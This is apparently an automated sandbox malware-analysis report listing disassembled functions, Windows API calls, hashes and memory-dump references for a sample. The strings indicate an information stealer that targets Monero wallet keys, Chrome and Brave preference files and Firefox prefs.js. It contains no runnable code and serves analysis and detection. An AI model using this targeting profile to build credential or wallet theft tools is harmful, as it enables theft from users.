                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 8a45ed0c80e003ba7317bee2efd4d87a89823cc9eb57af2b7c65453f405ac3cd
                  • Instruction ID: 32a808ae8efa8f9f11e501752144f79c01134975a6272bfe6173eb4384e69e72
                  • Opcode Fuzzy Hash: 8a45ed0c80e003ba7317bee2efd4d87a89823cc9eb57af2b7c65453f405ac3cd
                  • Instruction Fuzzy Hash: 88E08670985308FBE7206BA09C0AB0C7A7CAB44B02F100044F70C761C0C7B42640969A
                  Function 001310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001310B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001310F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 95b024779bbab6fcaf63ca4a2c417c0953d91c2c0809afd45cab2d271871329f
                  • Instruction ID: 89a6b84e26f797f7e556305f03ee882f770d9957df6b0c501dd78bffb641cf53
                  • Opcode Fuzzy Hash: 95b024779bbab6fcaf63ca4a2c417c0953d91c2c0809afd45cab2d271871329f
                  • Instruction Fuzzy Hash: 37F027B1641308BBEB189BA4AC49FBFB7ECE705B15F300448F504E7280D6719F40CAA1
                  Function 00131190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 001478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147910
                    • Part of subcall function 001478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00147917
                    • Part of subcall function 001478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0014792F
                    • Part of subcall function 00147850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001311B7), ref: 00147880
                    • Part of subcall function 00147850: RtlAllocateHeap.NTDLL(00000000), ref: 00147887
                    • Part of subcall function 00147850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0014789F
                  • ExitProcess.KERNEL32 ref: 001311C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 46b1ce589fe0439a4a841ca19388f0886439b2a8ceafb895a53cf848bd9f1569
                  • Instruction ID: 22cf634fa7a467b1b34caa07b05b79ff47c28c665c987011001e4d14d8a8bec1
                  • Opcode Fuzzy Hash: 46b1ce589fe0439a4a841ca19388f0886439b2a8ceafb895a53cf848bd9f1569
                  • Instruction Fuzzy Hash: 5EE017B591430263CE2077B1AC0AB2E329C5B6474AF140828FA09D3262FBA5E840866A

                  Non-executed Functions

                  Function 001438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 001438CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 001438E3
                  • lstrcat.KERNEL32(?,?), ref: 00143935
                  • StrCmpCA.SHLWAPI(?,00150F70), ref: 00143947
                  • StrCmpCA.SHLWAPI(?,00150F74), ref: 0014395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00143C67
                  • FindClose.KERNEL32(000000FF), ref: 00143C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 8ccd10a2970005aae0b0ec60225f1a77fce198ee381051280224f3cb2b5da99c
                  • Instruction ID: 18c80b275484a03072bae67855c2fdd7151de0e858b15e27554524256e3598d5
                  • Opcode Fuzzy Hash: 8ccd10a2970005aae0b0ec60225f1a77fce198ee381051280224f3cb2b5da99c
                  • Instruction Fuzzy Hash: B3A160B2A00218ABDB35EFA4DC85FEE737CBF98301F044589A51D96151EB719B84CF62
                  Function 0013BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00150B32,00150B2B,00000000,?,?,?,001513F4,00150B2A), ref: 0013BEF5
                  • StrCmpCA.SHLWAPI(?,001513F8), ref: 0013BF4D
                  • StrCmpCA.SHLWAPI(?,001513FC), ref: 0013BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0013C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 38c4657cafe4a2a7b84ea51cfebe9fb1b9714bfe907c9d8db9f8a2179001406c
                  • Instruction ID: 29b8ea2177c4ab95354273dcb76f96931444ba247c35933104e40252da61a146
                  • Opcode Fuzzy Hash: 38c4657cafe4a2a7b84ea51cfebe9fb1b9714bfe907c9d8db9f8a2179001406c
                  • Instruction Fuzzy Hash: 5F428672940104ABDB14FBB0DC96EED737DAFA4301F814558F90AA71A1EF349B49CB92
                  Function 00144910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0014492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00144943
                  • StrCmpCA.SHLWAPI(?,00150FDC), ref: 00144971
                  • StrCmpCA.SHLWAPI(?,00150FE0), ref: 00144987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00144B7D
                  • FindClose.KERNEL32(000000FF), ref: 00144B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: bef57b7b4a44a3b33549202df5d571243969ec2686052bf0439b8dbd7ea40d45
                  • Instruction ID: 27c3ebbb024cdf289cf3ad74d0c4603103294ee2fc9b123afe3973c1a511b7d7
                  • Opcode Fuzzy Hash: bef57b7b4a44a3b33549202df5d571243969ec2686052bf0439b8dbd7ea40d45
                  • Instruction Fuzzy Hash: 5B6153B2900618ABCB35EBE0DC45FEE737CBB98701F044588B51D96151EB719B89CF92
                  Function 00144570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00144580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00144587
                  • wsprintfA.USER32 ref: 001445A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 001445BD
                  • StrCmpCA.SHLWAPI(?,00150FC4), ref: 001445EB
                  • StrCmpCA.SHLWAPI(?,00150FC8), ref: 00144601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0014468B
                  • FindClose.KERNEL32(000000FF), ref: 001446A0
                  • lstrcat.KERNEL32(?,0102E560), ref: 001446C5
                  • lstrcat.KERNEL32(?,0102D1B8), ref: 001446D8
                  • lstrlen.KERNEL32(?), ref: 001446E5
                  • lstrlen.KERNEL32(?), ref: 001446F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 74966b3c8ca95725963f289b51ffef466857ae119f1ed6c942f75a73a856b716
                  • Instruction ID: cba2b19bb61d642d3136e187840226a13a52831bc8ed6a44d96e2c017cfb5493
                  • Opcode Fuzzy Hash: 74966b3c8ca95725963f289b51ffef466857ae119f1ed6c942f75a73a856b716
                  • Instruction Fuzzy Hash: E45166B2540218ABC735EBB0DC89FED777CAB98301F404588F61D96190EB749BC58F92
                  Function 00143EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00143EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00143EDA
                  • StrCmpCA.SHLWAPI(?,00150FAC), ref: 00143F08
                  • StrCmpCA.SHLWAPI(?,00150FB0), ref: 00143F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0014406C
                  • FindClose.KERNEL32(000000FF), ref: 00144081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 7327aca05964fb6e3f6cfd16cfe3177e14b9da3d3f0a968d66eba1ea0fa5e837
                  • Instruction ID: 2a33fcc22ca3916ce8be5b4c1eab03a7d09227daab197fb58f2c0ea941dffaef
                  • Opcode Fuzzy Hash: 7327aca05964fb6e3f6cfd16cfe3177e14b9da3d3f0a968d66eba1ea0fa5e837
                  • Instruction Fuzzy Hash: 525164B2900618BBCB35FBB0DC85EEE737CBB98301F404588B65D96050EB759B898F91
                  Function 0013ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0013ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0013ED55
                  • StrCmpCA.SHLWAPI(?,00151538), ref: 0013EDAB
                  • StrCmpCA.SHLWAPI(?,0015153C), ref: 0013EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0013F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: e4e2ca815edefa7923a0e217fef071ee95eb3a9144ca06d1344a1ac523eab3fc
                  • Instruction ID: 5d16dac48b35383d744e35d63bbb3a55ffe46d2b2223c63d23d081a40ddb83f6
                  • Opcode Fuzzy Hash: e4e2ca815edefa7923a0e217fef071ee95eb3a9144ca06d1344a1ac523eab3fc
                  • Instruction Fuzzy Hash: B9E10672951119AAFB55FB60DC52EEE733CEF64305F814199B40A620A2EF306F8ACF51
                  Function 0013F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001515B8,00150D96), ref: 0013F71E
                  • StrCmpCA.SHLWAPI(?,001515BC), ref: 0013F76F
                  • StrCmpCA.SHLWAPI(?,001515C0), ref: 0013F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0013FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 87b8a36b98a39d70953f1c83227a469982ae7670985f7b7bf41fa06ed8a54e7f
                  • Instruction ID: 156b4273d17483d64a060957550030ee559a37096c7a6fbcdb92c0fe249074c6
                  • Opcode Fuzzy Hash: 87b8a36b98a39d70953f1c83227a469982ae7670985f7b7bf41fa06ed8a54e7f
                  • Instruction Fuzzy Hash: 1CB176719401089BDB24FF60DC96FEE7379AFA4305F8185A8E40A97151EF315B4ACF92
                  Function 001316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0015510C,?,?,?,001551B4,?,?,00000000,?,00000000), ref: 00131923
                  • StrCmpCA.SHLWAPI(?,0015525C), ref: 00131973
                  • StrCmpCA.SHLWAPI(?,00155304), ref: 00131989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00131D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00131DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00131E20
                  • FindClose.KERNEL32(000000FF), ref: 00131E32
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  Strings
                  Memory Dump Source
